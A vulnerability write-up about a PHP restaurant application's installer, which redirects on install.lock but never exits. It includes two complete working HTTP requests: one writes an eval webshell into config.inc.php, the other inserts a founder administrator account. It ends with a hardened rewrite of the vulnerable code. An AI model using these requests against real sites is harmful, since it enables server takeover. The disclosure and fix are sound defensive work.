The problem is in /install/index.php. After the program finishes installing, an install.lock file is generated in the program's root directory, but /install/index.php gets the check for install.lock wrong.
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");    // no exit after the redirect
}
//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
As you can see, when install.lock exists /install/index.php only issues a 302 redirect via header() and never exits, so the logic below it still executes. At least two vulnerabilities arise from this.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);    // '==' as it appears in the posted code
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);    // writes the submitted data into a PHP file
The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
But this method is very dangerous: overwriting the config file will make the site stop working.

2. Adding an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");
        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";    // alert: administrator name must not be empty
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";    // alert: passwords do not match; no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");    // an administrator can be inserted directly
    }
This way we can directly insert an administrator account qingshen/qingshen with the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
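A hardened version of the three weak spots discussed above (the non-terminating redirect, the string-built config file, and the unchecked admin insert), written here as an added example and not code from the application or the post. It assumes the page's file layout (../install.lock, ../config/config.inc.php), a PDO connection $pdo in place of the removed mysql_* API, and password_hash() in place of the application's umd5().

```php
<?php
// Added example (not the application's own code). Assumes ../install.lock and
// ../config/config.inc.php as on the page, and a PDO connection $pdo.

// 1. The lock check must terminate the script; a Location header alone is
//    advisory and the rest of the installer would otherwise still run.
if (file_exists(__DIR__ . '/../install.lock')) {
    header('Location: ../', true, 302);
    exit;
}

// 2. Emit config values as PHP string literals via var_export(), so a value
//    containing  ");  or  ?>  cannot close the define() call or leave PHP mode.
function buildConfig(array $post): string
{
    $keys = ['MYSQL_HOST' => 'mysql_host', 'MYSQL_USER' => 'mysql_user',
             'MYSQL_PWD'  => 'mysql_pwd',  'MYSQL_DB'   => 'mysql_db',
             'TABLE_PRE'  => 'tblpre',     'DOMAIN'     => 'domain'];
    $out = "<?php\n";
    foreach ($keys as $const => $field) {
        $val = trim((string) ($post[$field] ?? ''));
        $out .= 'define(' . var_export($const, true) . ', '
              . var_export($val, true) . ");\n";
    }
    $out .= "define('MYSQL_CHARSET', 'GBK');\n";
    $out .= "define('SKINS', 'default');\n";   // no closing ?> tag needed
    return $out;
}

// 3. Validate, then stop on failure (the original only echoed an alert and
//    fell through to the INSERT); bind the name instead of interpolating it.
function createAdmin(PDO $pdo, string $tblpre, array $post): void
{
    $name = trim((string) ($post['adminname'] ?? ''));
    $pwd1 = trim((string) ($post['pwd1'] ?? ''));
    $pwd2 = trim((string) ($post['pwd2'] ?? ''));
    if ($name === '' || $pwd1 === '' || $pwd1 !== $pwd2) {
        http_response_code(400);
        exit('invalid administrator name or password');
    }
    // The prefix is spliced into the table name, so whitelist its characters.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $tblpre)) {
        exit('invalid table prefix');
    }
    $stmt = $pdo->prepare("INSERT INTO {$tblpre}admin (adminname, password, isfounder) VALUES (?, ?, 1)");
    $stmt->execute([$name, password_hash($pwd1, PASSWORD_DEFAULT)]);
}
```

With var_export() the mysql_host payload from the first request becomes an ordinary quoted string inside define(), and the step-5 handler never reaches the INSERT when the password check fails.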